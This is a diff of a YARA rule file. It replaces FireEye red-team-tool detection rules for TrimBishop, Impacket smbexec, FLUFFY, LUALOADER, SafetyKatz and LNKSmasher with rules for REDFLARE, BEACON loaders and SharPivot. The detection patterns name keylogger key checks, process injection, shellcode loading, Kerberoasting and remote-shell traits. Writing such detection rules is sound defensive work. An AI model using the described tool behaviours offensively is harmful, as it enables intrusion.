-		description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "4d58f0a2-bf16-584c-8e92-c8ef54427767"
-		date = "2020-12-09"
+		id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "09bdbad8358b04994e2c04bb26a160ef"
-		logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677"
+		hash = "fbefb4074f1672a3c29c1a47595ea261"
+		logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$msg = "msg" ascii wide
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "RuralBishop" ascii wide
-		$str2 = "KnightKingside" ascii wide
-		$str3 = "ReadShellcode" ascii wide
-		$str4 = "ReverseString" ascii wide
-		$str5 = "DTrim" ascii wide
-		$str6 = "QueensGambit" ascii wide
-		$str7 = "Messages" ascii wide
-		$str8 = "NtQueueApcThread" ascii wide
-		$str9 = "NtAlertResumeThread" ascii wide
-		$str10 = "NtQueryInformationThread" ascii wide
+		$create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 }
+		$keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and #msg > 60 and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_2 : FILE
 {
 	meta:
-		description = "smbexec"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5"
+		id = "84881e5c-05df-5911-af42-ec82e559588c"
+		date = "2020-11-27"
+		date = "2020-11-27"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_2.yar#L4-L20"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "9529c4c9773392893a8a0ab8ce8f8ce1,05b99d438dac63a5a993cea37c036673"
+		logic_hash = "1f2e1f644b1932486444dfda30b7dad7f50121f59fa493eb8a1a0528ae46db26"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		rev = 2
+
+	strings:
+		$1 = "initialize" fullword
+		$2 = "getData" fullword
+		$3 = "putData" fullword
+		$4 = "fini" fullword
+		$5 = "Cookie: SID1=%s" fullword
+
+	condition:
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+}
+rule FIREEYE_RT_APT_Keylogger_Win32_REDFLARE_1 : FILE
+{
+	meta:
+		description = "No description has been set in the source file - FireEye-RT"
+		author = "FireEye"
+		id = "ad14db66-d640-5712-b2c8-a3d42d5a90f3"
 		date = "2020-12-01"
 		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "0b1e512afe24c31531d6db6b47bac8ee"
-		logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e"
+		hash = "d7cfb9fbcf19ce881180f757aeec77dd"
+		logic_hash = "aebbaa050bee3775ffac4214ea4ab58284384e7eb41e66ee4838b9359e72821e"
 		score = 75
-		quality = 50
-		tags = ""
-		rev = 1
+		quality = 75
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$s1 = "class CMDEXEC" nocase
-		$s2 = "class RemoteShell" nocase
-		$s3 = "self.services_names"
-		$s4 = "import random"
-		$s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase
-		$s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/
+		$create_window = { 6A 00 68 [4] 6A 00 6A 00 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 00 80 68 00 00 CF 00 68 [4] 68 [4] 6A 00 FF 15 }
+		$keys_check = { 6A 14 [0-5] FF [1-5] 6A 10 [0-5] FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A0 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 75 ?? 68 A1 00 00 00 FF [1-5] B9 00 80 FF FF 66 85 C1 74 }
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7"
-		date = "2020-12-04"
-		date = "2020-12-04"
+		id = "6a585401-bfd3-5aad-b484-09b6a30d9af5"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
-		logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86"
+		hash = "4e7e90c7147ee8aa01275894734f4492"
+		logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B }
-		$sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 }
-		$ss1 = "\x00Fluffy\x00"
+		$inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF }
+		$s1 = "ResumeThread"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE
+rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8"
-		date = "2020-12-04"
-		date = "2020-12-04"
+		id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "11b5aceb428c3e8c61ed24a8ca50553e"
-		logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37"
+		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
+		logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "\x00Asktgt\x00"
-		$s2 = "\x00Kerberoast\x00"
-		$s3 = "\x00HarvestCommand\x00"
-		$s4 = "\x00EnumerateTickets\x00"
-		$s5 = "[*] Action: " wide
-		$s6 = "\x00Fluffy.Commands\x00"
+		$1 = "/RedFlare/gorat_server"
+		$2 = "RedFlare/sandals"
+		$3 = "goratsvr.CommandResponse" fullword
+		$4 = "goratsvr.CommandRequest" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_2 : FILE
+rule FIREEYE_RT_APT_Trojan_Linux_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "f2826dbb-f0a4-5361-94d1-8509c60c4131"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "220302bc-4ed3-5e10-9bd2-a8ed2bdaef73"
+		date = "2020-12-02"
+		date = "2020-12-02"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Linux_REDFLARE_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "700927768669eda6976071306e991bfaae136279f4265980521597c699fbed88"
+		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
+		logic_hash = "282f11c4c86d88d05f11e92f5483701d9a54c2dd39f21316cd271aa78a338d0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
-		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
-		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
-		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
-		$ss5 = "1F 8B 08 00 00 00 00 00" wide
-		$ss6 = "\x00LoadLibrary\x00"
-		$ss7 = "\x00GetProcAddress\x00"
-		$ss8 = "\x00VirtualProtect\x00"
+		$s1 = "find_applet_by_name" fullword
+		$s2 = "bb_basename" fullword
+		$s3 = "hk_printf_chk" fullword
+		$s4 = "runCommand" fullword
+		$s5 = "initialize" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint32( 0 ) == 0x464c457f ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_LUALOADER_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_6 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "970a869e-bd69-5609-bb8d-77bfa78b0630"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "5875a9ec-c3ee-57f0-a430-4443db585def"
+		date = "2020-12-01"
+		date = "2020-12-01"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_Loader_MSIL_LUALOADER_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/supplemental/yara/APT_Trojan_Win_REDFLARE_6.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "2d73d434ac39ebde990aca817a54208cd04bfbce33f1bcadcf48a50d9389658c"
+		hash = "294b1e229c3b1efce29b162e7b3be0ab, 6902862bd81da402e7ac70856afbe6a2"
+		logic_hash = "1e6f8320e0c0b601fc72fa4d9c61e46adfbcd84638c97da5988ca848e036312a"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		rev = 2
 
 	strings:
-		$sb1 = { 1? 72 [4] 14 D0 [2] 00 02 28 [2] 00 0A 1? 8D [2] 00 01 13 ?? 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 1? 1? 14 28 [2] 00 0A A2 11 ?? 28 [2] 00 0A 28 [2] 00 0A 80 [2] 00 04 7E [2] 00 04 7B [2] 00 0A 7E [2] 00 04 11 ?? 11 ?? 6F [2] 00 0A 6F [2] 00 0A }
-		$ss1 = "\x3bN\x00e\x00o\x00.\x00I\x00r\x00o\x00n\x00L\x00u\x00a\x00.\x00L\x00u\x00a\x00C\x00o\x00m\x00p\x00i\x00l\x00e\x00O\x00p\x00t\x00i\x00o\x00n\x00s\x00"
-		$ss2 = "\x19C\x00o\x00m\x00p\x00i\x00l\x00e\x00C\x00h\x00u\x00n\x00k\x00"
-		$ss3 = "\x0fd\x00o\x00c\x00h\x00u\x00n\x00k\x00"
-		$ss4 = /.Reflection.Assembly:Load\(\w{1,64}\);?\s{0,245}\w{1,64}\.EntryPoint:Invoke\(nil/ wide
-		$ss5 = "1F 8B 08 00 00 00 00 00" wide
+		$s1 = "RevertToSelf" fullword
+		$s2 = "Unsuccessful" fullword
+		$s3 = "Successful" fullword
+		$s4 = "runCommand" fullword
+		$s5 = "initialize" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_LUALOADER_1 : FILE
+rule FIREEYE_RT_Trojan_Win_Generic_101 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'lualoader' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e8480cf8-1852-5572-8e92-c0ae676b7507"
-		date = "2020-12-09"
+		id = "0290aaea-d65b-5883-97f9-549d107e3e1f"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LUALOADER/production/yara/APT_HackTool_MSIL_LUALOADER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Win_Generic_101.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "7e9f9836ec91aa66c8779588cfceff718487f0cb5048d17538c947aba687a4cf"
+		hash = "2e67c62bd0307c04af469ee8dcb220f2"
+		logic_hash = "e530183f3cab01560b1abc91e2111e5d9e5aadc1c8134027ac07d8917f9419a0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid0 = "8b546b49-2b2c-4577-a323-76dc713fe2ea" ascii nocase wide
+		$s0 = { 2A [1-16] 17 [1-16] 02 04 00 00 [1-16] FF 15 }
+		$s1 = { 81 7? [1-3] 02 04 00 00 7? [1-3] 83 7? [1-3] 17 7? [1-3] 83 7? [1-3] 2A 7? }
+		$s2 = { FF 15 [4-16] FF D? [1-16] 3D [1-24] 89 [1-8] E8 [4-16] 89 [1-8] F3 A4 [1-24] E8 }
+		$si1 = "PeekMessageA" fullword
+		$si2 = "PostThreadMessageA" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and @s0 [ 1 ] < @s1 [ 1 ] and @s1 [ 1 ] < @s2 [ 1 ] and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_SAFETYKATZ_4 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_18 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SafetyKatz project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e160b75d-cc39-5e16-86e1-cba9fe64a6b6"
-		date = "2020-12-09"
+		id = "6f44bd64-29bd-50e2-8b61-7ba61bb1f688"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SAFETYKATZ/production/yara/HackTool_MSIL_SAFETYKATZ_4.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_18.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "45736deb14f3a68e88b038183c23e597"
-		logic_hash = "a02b4acea691d485f427ed26487f2f601065901324a8dcd6cd8de9502d8cd897"
+		hash = "c74ebb6c238bbfaefd5b32d2bf7c7fcc"
+		logic_hash = "28c9497f646fcf3daf7007d7afd37971dd85382062c064173f13049ad419fef1"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid1 = "8347E81B-89FC-42A9-B22C-F59A6A572DEC" ascii nocase wide
+		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
+		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
+		$si1 = "fread" fullword
+		$si2 = "fwrite" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Netshshellcoderunner_1 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_17 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'NetshShellCodeRunner' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b3521812-7ea3-5f80-89bd-3bdd71b687f2"
-		date = "2020-12-09"
+		id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/NETSHSHELLCODERUNNER/production/yara/Loader_MSIL_NetshShellCodeRunner_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Loader_Win_Generic_17.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "97f6475a9d42697f633e06a9b04a85021ca4920145eb4af257d71b431448f0e9"
+		hash = "562ecbba043552d59a0f23f61cea0983"
+		logic_hash = "5c20472c3af0c5b8c825671b12763900d6a711695ed04661b33cbf442422348d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 3
 
 	strings:
-		$typelibguid0 = "49c045bc-59bb-4a00-85c3-4beb59b2ee12" ascii nocase wide
+		$s0 = { 89 [1-16] FF 15 [4-16] 89 [1-24] E8 [4-16] 89 C6 [4-24] 8D [1-8] 89 [1-4] 89 [1-4] E8 [4-16] 89 [1-8] E8 [4-24] 01 00 00 00 [1-8] 89 [1-8] E8 [4-64] 8A [1-8] 88 }
+		$s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 }
+		$si1 = "fread" fullword
+		$si2 = "fwrite" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Dropper_LNK_Lnksmasher_1 : FILE
+rule FIREEYE_RT_Trojan_Raw_Generic_4 : FILE
 {
 	meta:
-		description = "The LNKSmasher project contains a prebuilt LNK file that has pieces added based on various configuration items. Because of this, several artifacts are present in every single LNK file generated by LNKSmasher, including the Drive Serial #, the File Droid GUID, and the GUID CLSID."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1b93ddf8-9578-5e47-b479-4c9e8a40b4f4"
-		date = "2020-12-09"
+		id = "9092f9bb-cab6-55c0-9452-70a6407db93a"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/production/yara/Dropper_LNK_LNKSmasher_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BEACON/supplemental/yara/Trojan_Raw_Generic_4.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "0a86d64c3b25aa45428e94b6e0be3e08"
-		logic_hash = "61d1ac67ac0d332ad842a522cbebe1b9af1482d58a210b50fb45209355c0aeeb"
+		hash = "f41074be5b423afb02a74bc74222e35d"
+		logic_hash = "8ffd23631c1a9d1abe6695858ec34d61261b3b3f097be94372f3f34e46e7211e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 6
+		rev = 1
 
 	strings:
-		$drive_serial = { 12 F7 26 BE }
-		$file_droid_guid = { BC 96 28 4F 0A 46 54 42 81 B8 9F 48 64 D7 E9 A5 }
-		$guid_clsid = { E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 30 9D }
-		$header = { 4C 00 00 00 01 14 02 }
+		$s0 = { 83 ?? 02 [1-16] 40 [1-16] F3 A4 [1-16] 40 [1-16] E8 [4-32] FF ( D? | 5? | 1? ) }
+		$s1 = { 0F B? [1-16] 4D 5A [1-32] 3C [16-64] 50 45 [8-32] C3 }
 
 	condition:
-		$header at 0 and all of them
+		uint16( 0 ) != 0x5A4D and all of them
 }
-rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpivot_1 : FILE
 {
 	meta:
-		description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1a12e475-bb18-55ab-b629-47b711c10e6b"
-		date = "2018-09-04"
+		id = "c2834bd6-efb0-5dac-adcd-a9450090fc28"
+		date = "2020-11-25"
+		date = "2020-11-25"
 		modified = "2020-12-09"
